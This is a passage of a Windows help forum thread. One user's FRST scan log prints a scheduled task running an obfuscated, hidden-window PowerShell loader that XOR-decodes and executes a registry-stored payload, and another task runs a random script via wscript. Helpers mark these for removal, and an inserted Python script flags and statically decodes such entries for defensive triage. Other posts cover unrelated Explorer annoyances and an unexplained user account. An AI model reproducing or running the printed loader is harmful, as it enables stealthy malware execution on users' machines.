23.07.2023., 22:45   #1291
domy_os
I'd say some malware is involved, because that PowerShell task doesn't look legit to me; post a HijackThis log.

https://www.bleepingcomputer.com/download/hijackthis/

As a precaution, disable script execution: run PowerShell as admin and paste:

Code:
# Returns $true only when Windows Script Host is disabled (Enabled = 0)
try {
	if(-NOT (Test-Path -LiteralPath "HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings")){ return $false };
	if((Get-ItemPropertyValue -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -ea SilentlyContinue) -eq 0) {  } else { return $false };
}
catch { return $false }
return $true

# and finally

powershell Set-ExecutionPolicy -ExecutionPolicy Restricted

24.07.2023., 02:18   #1292
fre@k
Quote:
Originally posted by domy_os
I'd say some malware is involved, because that PowerShell task doesn't look legit to me; post a HijackThis log.

https://www.bleepingcomputer.com/download/hijackthis/

As a precaution, disable script execution: run PowerShell as admin and paste:

Code:
# Returns $true only when Windows Script Host is disabled (Enabled = 0)
try {
	if(-NOT (Test-Path -LiteralPath "HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings")){ return $false };
	if((Get-ItemPropertyValue -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -ea SilentlyContinue) -eq 0) {  } else { return $false };
}
catch { return $false }
return $true

# and finally

powershell Set-ExecutionPolicy -ExecutionPolicy Restricted

I typed this into PowerShell and it returned false.

Quote:
Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 1:16:50, on 24.7.2023.
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.19041.1566)


Boot mode: Normal

25.07.2023., 21:02   #1293
domy_os
Any changes? With this you can disable the script host completely...

Code:
New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue

I don't see anything suspicious in the HJT log, but post the FRST logs as well...

https://www.bleepingcomputer.com/for...ery-scan-tool/

Save it to the desktop, close all applications, run FRST as admin and upload FRST.txt and Addition.txt.

30.07.2023., 10:12   #1294
pogi
What do the green check marks on the desktop icons mean?

30.07.2023., 10:21   #1295
xlr
The files/shortcuts are synced with OneDrive (or some other cloud/NAS: Dropbox, Synology...).

05.08.2023., 23:40   #1296
fre@k
Quote:
Originally posted by domy_os
Any changes? With this you can disable the script host completely...

Code:
New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue

I don't see anything suspicious in the HJT log, but post the FRST logs as well...

https://www.bleepingcomputer.com/for...ery-scan-tool/

Save it to the desktop, close all applications, run FRST as admin and upload FRST.txt and Addition.txt.

Quote:
==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {AA4E7D09-9A75-4EC8-A544-7AE09FE2BF2C} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3571168 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {4B2166D7-9095-4E41-8514-761031C41EFF} - System32\Tasks\Adobe-Genuine-Software-Integrity-Scheduler-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3807712 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {39C03E5D-2DA3-4F39-B932-843B937F87A9} - System32\Tasks\AMD Updater => "C:\Program Files\AMD\CIM\\Bin64\RadeonInstaller.exe" /AUTOUPDATEIN (No File)
Task: {362C6AB5-4825-4EF1-91A6-1B2EF3E23A1E} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {3C99DAB8-74FF-48FD-A420-2D819752AA23} - System32\Tasks\AMDRyzenMasterSDKTask => C:\Program Files\AMD\CNext\CNext\cpumetricsserver.exe [329216 2022-04-28] (Advanced Micro Devices, Inc.) [File not signed]
Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)
Task: {B6D087B8-7386-4E55-B3D0-479AE5B8B90B} - System32\Tasks\CorelUpdateHelperTask-3A0684C52AD8F776732C9B1769387381 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {D1A4030E-7946-457D-9793-190B52233518} - System32\Tasks\CorelUpdateHelperTask-CA97E265125F962DF330CDDECA55BEE5 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {9C9FF58C-A602-46F5-AAE7-A84FA91F0C86} - System32\Tasks\CorelUpdateHelperTaskCore => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {60FB7528-96B7-4FA1-B245-6B63B40A5F47} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {37CA0682-E6DF-49F6-8163-0FA4D5DC50D2} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {C3330DB9-49FB-4267-89AC-052150FEDDF0} - System32\Tasks\eID Updater => C:\Program Files\AKD\eID Middleware\Updater.exe [1180352 2022-09-09] (AKD d.o.o. -> Agencija za komercijalnu djelatnost)
Task: {05394564-3C71-4D68-9648-25FF67BB7DF3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {589D9887-524D-4F64-A8D4-284AF9A1EE9E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {AF9D7CB3-4F89-4566-BC65-5AA0F26EBBDA} - System32\Tasks\GPU Tweak III => C:\Program Files (x86)\ASUS\GPUTweakIII\GPU Tweak III.exe (No File)
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION
Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
Task: {BB849378-0BD7-4B2F-95F5-770D9CDF04AC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {D5027B44-EABC-4281-A4B1-4AE77EB51887} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {34C46FA8-19E5-4D6A-A5E0-987A63C380DD} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {13FD3601-86C6-4450-A538-023F355286CA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7899D856-F71C-4C55-A4C4-56EF43747554} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {C6CC0EEB-5664-4B80-B25B-C44066678B6A} - System32\Tasks\NahimicSvc64Run => C:\Windows\System32\NahimicSvc64.exe [1094808 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {048CC466-9E92-4167-B46A-3AE942372F8A} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [5339512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {5763BDB9-76F7-4E06-A9A5-DF31824F83EB} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [5659512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {DC6568DB-8280-4900-A49A-A3C5C22FB845} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [5839224 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {99A4D46B-6BA9-48BD-8FB2-327DC62F789C} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [56368 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {0FAD7383-8483-46BA-B554-AAE7B51C68B4} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [261680 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {11B7C842-A90B-41BB-AD4E-5835311B3248} - System32\Tasks\update-S-1-5-21-1851460496-1243864188-3666012494-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Task: {2CD04026-E5A8-41BD-B48E-08B3B9470A72} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
So, I googled everything, but I don't know what this one is related to:

Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN

06.08.2023., 00:26   #1297
domy_os
I would remove this:

Code:
Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)
 
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION

Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
And I would disable this, then re-enable it if there are problems with sound:

Code:
Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic)

Task: {C6CC0EEB-5664-4B80-B25B-C44066678B6A} - System32\Tasks\NahimicSvc64Run => C:\Windows\System32\NahimicSvc64.exe [1094808 2021-11-01] (A-Volute SAS -> Nahimic)
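
An added example (not part of any post in this thread, and not FRST's own logic): a Python pass over FRST `Task:` lines that flags script-host and obfuscated-PowerShell actions like the two picked out above, and extracts the registry key, value name and XOR constant from the launcher so the stored value can be decoded for reading instead of being run. The rule names, `CONSTRUCTED_BLOB` and the assumption that the registry value is exported as bytes are assumptions of this example; the four log lines are copied from the FRST log quoted in the thread.

```python
import re

# Line shape assumed from the FRST entries quoted in this thread:
#   Task: {GUID} - <task path> => <action: executable [size date] (signer) -> arguments>
TASK_RE = re.compile(r"^Task: \{(?P<guid>[0-9A-Fa-f-]{36})\} - (?P<task>.+?) => (?P<action>.+)$")

# Heuristics picked for this example (not FRST's rules), matched against the action text.
RULES = {
    "script-host": re.compile(r"\\(?:wscript|cscript|mshta)\.exe\b", re.I),
    "pipe-to-powershell": re.compile(r"\|\s*powershell\b", re.I),
    "hidden-window": re.compile(r"-windowstyle\s+hidden\b", re.I),
    "dynamic-eval": re.compile(r"\biex\b|invoke-expression|\[scriptblock\]::create", re.I),
    "xor-decode": re.compile(r"-bxor\s+\d+", re.I),
    "registry-payload": re.compile(r"get-itemproperty\s+-path\s+'hk(?:lm|cu):", re.I),
}

# Keywords normally written all-lower, all-upper or exactly as spelled here.
CANONICAL = ("PowerShell", "WindowStyle", "Hidden", "ScriptBlock", "Get-ItemProperty", "iex")

# Registry key, value name and XOR constant as they appear in the launcher command line.
LOADER_RE = re.compile(
    r"-path\s+'(?P<key>[^']+)'\)\.'(?P<value>[^']+)'.*?-bxor\s+(?P<xor>\d+)", re.I)


def odd_casing(action):
    """Return keywords written in randomised case, e.g. 'POWERsHELl'."""
    hits = []
    for word in CANONICAL:
        for m in re.finditer(re.escape(word), action, re.I):
            if m.group(0) not in (word, word.lower(), word.upper()):
                hits.append(m.group(0))
    return hits


def triage(line):
    """Parse one FRST task line; return its flags, or None if it is not a task line."""
    m = TASK_RE.match(line.strip())
    if not m:
        return None
    action = m.group("action")
    flags = [name for name, rx in RULES.items() if rx.search(action)]
    if odd_casing(action):
        flags.append("case-obfuscation")
    finding = {"guid": m.group("guid"), "task": m.group("task"), "flags": flags}
    loader = LOADER_RE.search(action)
    if loader:
        finding["registry"] = {"key": loader.group("key"), "value": loader.group("value"),
                               "xor": int(loader.group("xor"))}
    return finding


def review(log_text):
    """Return only the task entries that raised at least one flag."""
    parsed = (triage(line) for line in log_text.splitlines())
    return [f for f in parsed if f and f["flags"]]


def xor_decode(blob, key):
    """Undo the single-byte XOR for static reading; the text is returned, never executed."""
    return "".join(chr(b ^ key) for b in blob)


# Four entries copied from the FRST log quoted earlier in the thread.
SAMPLE_LOG = r"""
Task: {60FB7528-96B7-4FA1-B245-6B63B40A5F47} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION
Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
Task: {BB849378-0BD7-4B2F-95F5-770D9CDF04AC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
"""

# Constructed stand-in for an exported registry value (harmless text XORed with 201).
CONSTRUCTED_BLOB = bytes(c ^ 201 for c in b"Write-Output 'constructed sample'")

if __name__ == "__main__":
    for f in review(SAMPLE_LOG):
        print(f["task"], f["flags"], f.get("registry", ""))
    print(xor_decode(CONSTRUCTED_BLOB, 201))
```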

06.08.2023., 00:34   #1298
geronimo_2
Guys, ESET has started blocking the link to this thread. It reports some trojan. I assume it's because of all this code above, so it's acting up.

10.01.2024., 10:38   #1299
spiderhr
Ugh, it annoys me so much that I can't open a second File Explorer once I've opened one, and have to use Ctrl+N instead. Is there some hack to get around that? They've really made crap of it.

10.01.2024., 11:08   #1300
kopija
Quote:
Originally posted by spiderhr
Ugh, it annoys me so much that I can't open a second File Explorer once I've opened one, and have to use Ctrl+N instead. Is there some hack to get around that? They've really made crap of it.

And how would you like to open it?

By the power of thought?

10.01.2024., 11:09   #1301
spiderhr
Quote:
Originally posted by kopija
And how would you like to open it?

By the power of thought?

The way it was before. You clicked the icon in the taskbar and it opened, and then on the same icon you could open a second, a third...

By the way, the grouping option is the first thing I turn off, because I don't like that approach.

10.01.2024., 11:13   #1302
udarnik60
Quote:
Originally posted by spiderhr
The way it was before. You clicked the icon in the taskbar and it opened, and then on the same icon you could open a second, a third...

By the way, the grouping option is the first thing I turn off, because I don't like that approach.

Doesn't Win + E open a new one for you? Or a middle click with the mouse on the icon in the taskbar?

10.01.2024., 11:40   #1303
spiderhr
Meh... too many clicks, plus I have to take my hand off the mouse. The Win + E one does open it.

I just wanted, since I already have shortcuts in the taskbar, to be able to open them multiple times with the mouse. Oh well, Linux has spoiled me, and up to W7 everything was normal, until they started pulling crazy stunts with the interface as if that were better.

Edit: I'm grumbling a bit at Windows. Better at Windows than at my colleagues.

Last edited by spiderhr; 10.01.2024. at 11:49.

11.01.2024., 21:09   #1304
mkey
A middle click on the taskbar icon should open another window, whatever the application (as long as it allows multiple instances).

11.02.2024., 15:19   #1305
Neo-ST
Folks, out of the blue a "user1" has appeared on my Windows.
So last night everything was normal, I shut down the PC, went to bed, today I turn it on and I'm greeted by that login menu to choose which user I'll log in to Windows with, my default one or this user1.
If I click on user1, it asks me for a password. Wtf.

I log in to mine and in Settings under users I see this:

Is it possible that some Windows update created that user?

EDIT:
I had to go into safe mode, cmd run as admin, "net user user1 /del" to delete that account.
After that a normal boot into Windows, then run netplwiz again and untick "users must enter username and password to log in to this computer", because without that it still stopped me at the login screen after boot.

Bravo Microsoft, bravo.

Last edited by Neo-ST; 11.02.2024. at 15:30.

12.02.2024., 19:39   #1306
mkey
It's a bit doubtful that Windows created that account.

12.02.2024., 21:05   #1307
domy_os